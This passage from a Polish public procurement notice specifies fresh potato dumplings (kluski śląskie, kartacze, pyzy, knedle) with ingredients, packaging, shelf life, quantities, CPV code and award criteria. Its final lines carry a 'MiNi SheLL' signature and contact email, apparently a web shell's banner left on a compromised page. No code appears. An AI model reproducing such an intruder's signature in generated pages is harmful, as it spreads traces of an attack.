jednostkowe: tacka styropianowa + folia spożywcza.; okres przydatności do spożycia: 72 godziny od daty dostawy ; waga ok. 500 g (4 szt.). Produkt świeży, niemrożony. kg 400 5 Kluski śląskie składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, niemrożony. kg 100 6 Kartacze składniki: ziemniaki surowe, gotowane, mąka pszenna, mąka ziemniaczana, jaja, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 600 g (5 szt.). Produkt świeży, nie mrożony. kg 100 7 Kartacze z mięsem składniki: ziemniaki surowe, gotowane, mąka pszenna, mąka ziemniaczana, jaja, farsz mięsny, sól; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 600 g (5 szt.). Produkt świeży, nie mrożony. kg 200 8 Pyzy z mięsem składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; farsz mięsny, opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (20 szt.). Produkt świeży, nie mrożony. kg 150 9 Knedle składniki: ziemniaki, mąka ziemniaczana, mąka pszenna, jaja, sól; farsz: truskawki, śliwki; opakowanie jednostkowe: tacka styropianowa + folia spożywcza; okres przydatności do spożycia: 72 godziny od daty dostawy; waga ok. 500 g (10 szt.). Produkt świeży, nie mrożony kg 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. najkrótszy czas wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com